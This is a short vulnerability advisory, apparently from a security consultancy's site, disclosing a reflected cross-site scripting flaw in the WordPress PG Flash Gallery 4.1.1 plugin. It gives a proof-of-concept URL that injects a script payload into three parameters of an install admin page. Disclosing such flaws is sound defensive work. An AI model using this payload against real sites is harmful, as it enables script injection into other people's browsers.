Home
Consulting
Advisories
Software
Articles
Contact

WordPress PG Flash Gallery 4.1.1 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in WordPress PG Flash Gallery 4.1.1 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/wordpress/wp-content/plugins/pg-flash-gallery/gallery/install/admin.php?album=%22;alert(0);//&img=%22;alert(0);//&xtras=%22;alert(0);//


Copyright © 2018 AutoSec Tools LLC